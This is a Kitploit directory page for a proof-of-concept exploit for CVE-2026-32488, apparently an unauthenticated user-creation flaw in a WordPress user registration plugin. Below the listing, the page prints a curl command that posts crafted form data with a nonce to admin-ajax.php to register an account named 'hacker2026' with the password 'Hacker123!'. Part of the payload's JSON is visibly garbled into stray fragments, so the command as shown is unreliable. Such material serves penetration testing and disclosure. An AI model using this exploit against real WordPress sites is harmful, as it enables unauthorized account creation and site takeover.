Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2026-32488 — Proof-of-concept exploit for CVE-2026-32488 targeting WordPress user registration via crafted POST requests to admin-ajax.php, enabling unauthenticated user creation. | Kitploit
Tools/GitHubGitHub/izxci/cve-2026-32488
Vulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringPenetration Testing
GitHubizxci/cve-2026-32488

CVE-2026-32488

Proof-of-concept exploit for CVE-2026-32488 targeting WordPress user registration via crafted POST requests to admin-ajax.php, enabling unauthenticated user creation.

View Repository
2 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2026-32488

CVE-2026-32488

Nonce değerini değişkene al

$NONCE = "c82a4f80ba"

curl.exe -s -X POST "http://localhost/wp-admin/admin-ajax.php" -d "action=user_registration_user_form_submit" -d "ur_frontend_form_nonce=$NONCE" -d "form_id=6" -d "form_data=[{"field_name":"user_login","value":"hacker2026","field_type":"text"},{"field_name":",":",":"},{":",":",":"}]"

"user_email
"value
"[email protected]
"field_type
"email
"field_name
"user_pass
"value
"Hacker123!
"field_type
"password
Download Tool